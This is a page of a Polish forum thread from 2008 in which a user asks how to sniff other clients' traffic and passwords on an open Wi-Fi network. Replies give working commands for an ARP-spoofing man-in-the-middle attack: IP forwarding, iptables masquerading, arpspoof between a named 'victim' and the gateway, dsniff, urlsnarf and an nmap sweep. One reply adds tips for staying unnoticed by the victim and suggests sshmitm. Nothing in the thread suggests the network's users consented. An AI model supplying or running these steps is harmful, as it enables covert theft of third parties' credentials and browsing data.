Strona 1 z 4 123 ... OstatniOstatni
Pokaż wyniki 1 do 10 z 33

Temat: Dsniff

  1. #1
    Zarejestrowany
    Jun 2007
    Postów
    59

    Domyślnie Dsniff-przechwytywanie pakietow w sieci Wi-Fi

    Kabinuje od jakiegos czas uruchomic tego snifera jestem polaczony z pewno siecia znam IP i adres Mac AP widze tez jest paru innych clientow.Jakie polecenie nalezy wywolac w consoli? zeby wychwytywac ruch z danego AP.Na razie udalo mi sie przechwycic tylko siebie
    Ostatnio edytowane przez hazi : 02-24-2008 - 17:10 Powód: poprawa bledow

  2. #2
    Zarejestrowany
    Feb 2007
    Skąd
    w domu :D
    Postów
    535

    Domyślnie

    Może coś więcej? jak ta siec wygląda? i tak dalej
    Pamiętaj zanim zapytasz sprawdź ten adres www.google.pl

  3. #3
    Zarejestrowany
    Jun 2007
    Postów
    59

    Domyślnie

    Ta Siec bezprzewodowa wogole nie jest zabezpieczona nie ma nawet filtracji mac kompletnie nic.Uruchamialem wireshark przechwyca tylko DHCP,ARP,CDP,STP nie ma zadnych ciekawych informacji np kto na jakie strony wchodzi czy hasla.Wiec zaczolem sie bawic Dsniff.
    Wpisywalem:
    1 .Consola. arpspoof -i eth1 192.168.1.197>&/dev/xxx
    2. Consola dsniff >>dsniff.03
    3. Consola arpsoof -i eth1 \-t 192.168.1.197 192.168.1.0
    wywala mi to chyba to blad couldn' arp for host 192.168.1.197 nie wiem
    co zle robie

  4. #4
    Zarejestrowany
    Feb 2007
    Skąd
    w domu :D
    Postów
    535

    Domyślnie

    A widzą sie komputery?Jesli widzi pakiety ARP przychodzące z sieci to powinnyo być ok,spróbuj coś takiego..

    z ROOT'a

    Kod:
    1.echo 1 > /proc/sys/net/ipv4/ip_forward
    2.iptables -t nat -A POSTROUTING -j MASQUERADE
    3.arpspoof -i eth1 -t  192.168.1.197 192.168.1.0
    3 podajesz adres kompa co chcesz sluchac go i to 2 to brama

    /edit

    jesli odpalisz
    Kod:
    arpspoof -i eth1 -t  192.168.1.197 192.168.1.0
    to zucasz na pasek i w nowej konsoli odpalasz
    Kod:
     dsniff -i eth1
    /edit 2

    jesli chcesz przechwytywac strony otwierane to
    Kod:
    urlsnarf -i eth1
    pozdrawiam
    Ostatnio edytowane przez eryk : 02-24-2008 - 21:53
    Pamiętaj zanim zapytasz sprawdź ten adres www.google.pl

  5. #5
    Zarejestrowany
    Jun 2007
    Postów
    59

    Domyślnie

    arpspoof -i eth1 -t 192.168.1.197 192.168.1.0

    Walnolem tu chyba byka ja myslam ze tu sie wpisuje zakres ip (IP do IP).Nic innego nie wymyslilem to wpisalem 0 na koncuWidze musze odpalic kismeta i zobaczyc jaka bedzie ta brama.Ja widze tylko mac clientow pod airodump albo pod kismetem.A sprawdzic czy kompy sie widza to nie wiem jak pewno tez trzeba wywolac polecenie.Pzdr
    Ostatnio edytowane przez hazi : 02-24-2008 - 22:16

  6. #6
    Zarejestrowany
    Feb 2007
    Skąd
    w domu :D
    Postów
    535

    Domyślnie

    proste ze brama to bedzie 192.168.1.1:P

    zpinguj ten adres i zaaktualizuj tablice arp

    Kod:
    arp -a
    ale powinno być wszystko ok..
    Pamiętaj zanim zapytasz sprawdź ten adres www.google.pl

  7. #7
    Zarejestrowany
    Jun 2007
    Postów
    59

    Domyślnie

    bt ~ # echo 1 > /proc/sys/net/ipv4/ip_forward
    bt ~ # iptables -t nat -A POSTROUTING -j MASQUERADE
    bt ~ # arpspoof -i eth1 -t 192.168.1.197 192.168.1.1
    arpspoof: couldn't arp for host 192.168.1.197
    bt ~ # ifconfig
    eth1 Link encap:Ethernet HWaddr 00:0F:34:425:A7
    inet addr:192.168.1.197 Bcast:192.168.1.255 Mask:255.255.255.0
    inet6 addr: fe80::20f:34ff:fe42:d5a7/64 Scope:Link
    UP BROADCAST NOTRAILERS RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:7343 errors:342732 dropped:0 overruns:0 frame:342732
    TX packets:4571 errors:79 dropped:0 overruns:0 carrier:79
    collisions:6970 txqueuelen:1000
    RX bytes:2241221 (2.1 MiB) TX bytes:547855 (535.0 KiB)
    Interrupt:3 Base address:0x180

    Dalej cos nie chce pojsc hmm a te ip inet addr.192.168.1.197 pokazuje moje IP czy IP AP do ktorego aktualnie jestem podlaczony?Bo jak to moje ip to wszystko jasne
    Ostatnio edytowane przez hazi : 02-24-2008 - 23:00

  8. #8
    Zarejestrowany
    Jan 2007
    Postów
    695

    Domyślnie

    sprawdz jakie ty masz ip i bedzie wszystko jasne
    Zbliża się Trollmagedon...

  9. #9
    Zarejestrowany
    Feb 2007
    Skąd
    w domu :D
    Postów
    535

    Domyślnie

    Tak to twoje IP,wyslij nampem pingi do wszystkich kompow z sieci i bedziesz wiedzial jakie sa adresy innych kompów

    Kod:
    nmap -sP 192.168.1.1-255
    Pamiętaj zanim zapytasz sprawdź ten adres www.google.pl

  10. #10
    Zarejestrowany
    Aug 2007
    Postów
    91

    Domyślnie

    Cytat Napisał hazi Zobacz post
    Kabinuje od jakiegos czas uruchomic tego snifera jestem polaczony z pewno siecia znam IP i adres Mac AP widze tez jest paru innych clientow.Jakie polecenie nalezy wywolac w consoli? zeby wychwytywac ruch z danego AP.Na razie udalo mi sie przechwycic tylko siebie

    po kolei...
    sniffer ktorego chcesz odpalic to dsniff , jest calkiem fajny zwlaszcza ze nie trzeba sie wczytywac w pakiety, on poprostu wywala login i hasla z przechwyconych sesji. Jesli wiec chcesz sprawdzic czy dziala to ofiara musi wykonac jakies logowanie, przykladowo poczta, mozesz zamiast tego odpalic sshmitm i pocwiczyc men in the middle ;-) ( czyli to co tygryski lubia najbardziej).

    w sprawie arpspoof..
    program ten jak sama nazwa wskazuje sluzy do spoofowania zapytan arp czyli rozwiazan IP-MAC. Ma to sens jedynie wtedy gdy chcesz aby dochodzil do ciebie ruch ktory normalnie nie dochodzi z powodu switchy. Jesli jestes przykladowo wpiety w port 1 switcha a "ofiara" w port 4 , to nie ma jak podsluchac jej pakietow. Arpspoof dziala tak ze mowi komputerowi ofiary ze IP_GATEWAYA ma twoj MAC, i jezeli robisz full duplex co zalecam , to takze powinien mowic gatewayowi ze ze IP_OFIARY ma twoj MAC. Po takim odpaleniu arpspoofa caly ruch miedzy ofiara i gatewayem idzie przez ciebie i dopiero wtedy zapuszczasz sniffery.
    Aby to spowodowac wystarcxzy w konolach dac polecenia:
    arpspoof -i interfejs -t IP_GATEWAYA IP_OFIARY
    i
    arpspoof -i interfejs -t IP_OFIARY IP_GATEWAYA

    zeby ofiara nie zauwazyla widocznych zamian to musisz:
    -wlaczyc forwardowanie : echo "1">/proc/sys/net/ipv4/ip_forward
    -(w skrocie mowiac) dac pelna przezroczystosc forwardowania pakietow, co by firewall niczego nie blokowal

    Podsumowujac, uwazam ze uzycie arpspoof jest absolutnie niepotrzebne w twoim przypadku ,bo jezeli mowa o radiu to nie trzeba niczego spoofowac bo wszystko i tak idzie do wszystkich, w duzym uproszczeniu mozna powiedziec ze tak jak w przypadku hubow.
    pozdrawiam

Strona 1 z 4 123 ... OstatniOstatni

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj